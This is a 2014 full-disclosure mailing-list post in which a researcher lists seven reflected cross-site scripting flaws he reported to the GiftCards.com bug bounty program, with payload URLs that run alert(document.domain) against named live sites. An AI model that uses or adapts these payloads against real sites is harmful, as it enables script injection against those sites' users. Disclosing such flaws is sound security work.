Message-ID: <5302FA0E.7060501@t-online.de>
Date: Tue, 18 Feb 2014 07:13:34 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: My experiences with the GiftCards.com Bug Bounty Program
Since November 2013 I have reported seven Cross-site Scripting
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible
given the simplicity of the vulnerabilities.

But what I really don't understand: Why do they still work to this day?
######################################
# 11/17/2013 Vulnerability #1: (DUP) #
######################################
// Reflected Cross-site Scripting
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//
// Original advisory
http://insight-labs.org/?p=738
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG
#########################################################
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #
#########################################################
// Reflected Cross-site Scripting (tested with FF 25.0.1)
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
// Original Advisory
http://inj3ct0rs.com/exploit/description/19711
Screenshots:
http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG
######################################
# 11/21/2013 Vulnerability #3: (DUP) #
######################################
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);
Screenshots:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG
http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG
######################################
# 11/26/2013 Vulnerability #4: (DUP) #
######################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #5: #
################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #6: #
################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #7: #
################################
// Reflected Cross-site Scripting with IE10
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG
Cheers,
sschurtz